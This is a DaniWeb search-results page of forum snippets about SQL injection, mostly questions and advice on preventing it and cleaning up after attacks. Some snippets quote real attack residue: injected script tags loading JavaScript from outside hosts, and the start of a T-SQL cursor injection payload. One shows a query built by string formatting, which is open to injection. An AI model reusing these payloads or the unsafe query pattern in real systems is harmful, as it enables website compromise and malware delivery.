Search DaniWeb - sql-injection

Re: SQL Injection 16 Years Ago by buddylee17 SQL injection is an attack on the database. Basically, injectors take an … SQL Injection 12 Years Ago by devianleong Hi, I'm new to PHP and I want to know how to prevent SQL injection? Any php features can prevent the SQL injection? Re: SQL Injection 12 Years Ago by ryantroop Adding/improving on what is above... Learn SQL and understand what an SQL injection attack is.... if you know the …language, you will understand what you don't want users putting into your SQL… threats before they are ever passed into your SQL query. Learning at minimum to use mysql_real_escape_string() … Re: Sql injection help 13 Years Ago by hericles … not sure about taking control of your server from an SQL injection attack but you can easily lose your database. I can… ascertain table names from the system tables. If you allow SQL injection attacks hackers can bypass your logins, pull out all the… Sql injection help 13 Years Ago by Karlwakim Hi everybody, I found an error-based sql injection in my webserver.My database doesn't contain any private info. I want to know if its possible to own my server just by using the info in information_shema. Please tell me because i want to know if i have to fix it.I don't want to get hacked! Thanks. I can provide additional info if you need it. SQL Injection 16 Years Ago by domeger We recently had a MSSQL injection on our server and don't know why it happened. … hacked through our asp code and then we have multiple sql injection of this random string in some tables. "<script… input into database writes, how can a person do a sql injection by phrasing off a compiled dll file that dosnt accept… Re: SQL Injection 16 Years Ago by circa66 …] This seems to have worked for me on a supposedly SQL Injection-proofed ASP website that was being attacked; hopefully it will… to Read-only=True (right-click the database name in SQL Server management studio, select properties, edit the Read-only property… Re: SQL Injection 16 Years Ago by circa66 …the CAST values, here is the actual SQL that is being injected: DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor …"); If !isNumeric(EntryId) 'bail and deploy SQL injection countermeasures End If So, maybe try searching your IIS logs for DECLARE or NVARCHAR… SQL Injection 16 Years Ago by anuj_sharma Hey Guys, I've heard that SQL Injection is one of the most common tool that the hackers use to hack a web application. Can anyone please give me a brief overview of what SQL Injection is or any webpages that I can refer to. Thanks SQL Injection 12 Years Ago by abelingaw Sorry, I don't know where to post this one. I would like to try executing an SQL Injection on a site (offline) i created with wamp. Just like to test the security of my site and try sql injection at the same time. If this kind of post isn't allowed, then its for deletion. Thanks Re: SQL Injection 16 Years Ago by anuj_sharma Is there any method by which SQL Injection can be stopped or any software available??? Re: SQL Injection 12 Years Ago by technoknol try some SQL injection strings to break into , and filter special characters from user input or convert user input into hex or anything else... SQL injection and Dynamic queries 13 Years Ago by Stefano Mtangoo … DAL class and I have done Query Parametrization to avoid SQL injection. As you can see the weakpoing for Dynamic Query is… to (hopefully) validate table variable before I can add to SQL command string. Now I was struggling if I should do… adding trouble? 4. How do you do to protect against SQL injection in your dynamic query if you have any? Sql Injection in java 14 Years Ago by prem2 … this operation using the prepared statement. How to avoid the sql injection in my java program.? *)I want to know functions to… ? *)Did any one know what are ways to implement the sql injection in java? In php , We use addslashes, mysql_real_escape_string ,mysql_escape_string etc… Re: Sql Injection in java 14 Years Ago by masijade If you are using preparedstatement [i]properly[/i] you are [i]already[/i] preventing sql injection. Sql injection and mysqldb 13 Years Ago by Zeref … with the python module MySQLdb and looking at sql injection. [CODE] import MySQLdb def hack(name):…MySQLdb.connect('xxx','xxx','xxx','xxx') cursor=db.cursor() sql="SELECT * FROM PLAYERS WHERE NAME = %s&…quot; %(name) print sql cursor.execute(sql) print cursor.fetchall() [/CODE] i entered Hack… SQL Injection Attacks 17 Years Ago by trudge …com_filebase" Component "filecatid" Parameter SQL Injection 08.08.42 - Joomla! and Mambo &… "id" Parameter SQL Injection 08.08.46 - AuraCMS Multiple SQL Injection Vulnerabilities 08.08.47 -… Portfolio Manager Component "categoryId" Parameter SQL Injection 08.08.50 - astatsPRO com_astatspro Component "… SQL injection vulnerability scanner 12 Years Ago by BARATUM I would like to develop a SQL injection vulnerbility scanner. However, i dont know how to develop it…requirement User able to input the target URL and apply SQL injection scanning on target URL After that, the scanner itself …would launch SQL injection attacks on the target URL And then the scanner would… SQL Injection Attack 22 Years Ago by samaru …is dynamically inserted through whatever script language into the SQL statement. There's nothing wrong with this statement…. The first apostrophe you see in the SQL statement in figure 2 closes the statement in…figure 1's last dash. So your original SQL statement (figure 1) will now be executed …on Google by searching for "SQL Injection" Re: SQl Injection through ASP and MS SQl 2000 17 Years Ago by hopalongcassidy If you are interested in reading a good piece on SQL Injection that tells you how to hack into sites that don'… share a URL with you: [url]http://ocliteracy.com/techtips/sql-injection.html[/url] This article is easy to read. It takes… Re: SQL Injection with ASCII 7 Years Ago by Reverend Jim …should first learn the definitions of 1. ASCII 1. SQL Injection Attack before asing the question. ASCII is a mapping … onto characters (EBCDIC and unicode are two others). SQL injection is a method of embedding unwanted (to the atackee…) SQL commands in other legitimate commands. It is independent … Re: SQL Injection Attack 15 Years Ago by cgyrob … resorted to using dotdefender after we came under a serious sql injection attack. The product worked very well and we were able… SQl Injection through ASP and MS SQl 2000 17 Years Ago by cancer10 Hello, I have heard a lot about SQL Injection. I was wondering how does an injector come to know about the table/column name when they cannot see the asp codes in a website? Can someone explain plz? Thanx sql injection help <script> 15 Years Ago by freshfitz How would I clean everhing after script got a sql injection attack Electric repeater beanie green<script src="http://nt010.cn/E/J.JS"></script><script src="http://nt004.cn/E/J.JS"></script> need to clean everything after <script> Sql injection tutorial 14 Years Ago by kapoorvarun23 hi guys i need a sql injection tutorial for the site built in asp.. Re: Sql injection tutorial 14 Years Ago by hielo How To: ======= [url]http://articles.sitepoint.com/article/sql-injection-attacks-safe[/url] [url]http://www.securiteam.com/securityreviews/5DP0N1P76E.… sql injection Warning: mysql_fetch_assoc(): 13 Years Ago by mapee Hello i have a problem with protect from sql injection : the problem is: Warning: mysql_fetch_assoc(): supplied argument is not a … SQL Injection Despite mysql_real_escape_string() 13 Years Ago by glut Hey, I'm currently using mysql_real_escape_string() to protect against SQL injection. Is there a way to exploit this? I have already tried \ to try to make the query \\', thus making it just a regular backslash. I have heard of the Big5 exploit, but I don't know how to use it / protect against it. Thanks so much, Glut. Re: SQL Injection Despite mysql_real_escape_string() 13 Years Ago by glut … Big5 character encoding, will the mysql_real_escape_string() still work against all SQL injection attacks for my website? SQL Injection Despite mysql_real_escape_string() 13 Years Ago by glut Hey, I'm currently using mysql_real_escape_string() to protect against SQL injection. Is there a way to exploit this? I have already tried \ to try to make the query \\', thus making it just a regular backslash. I have heard of the Big5 exploit, but I don't know how to use it / protect against it. Thanks so much, Glut.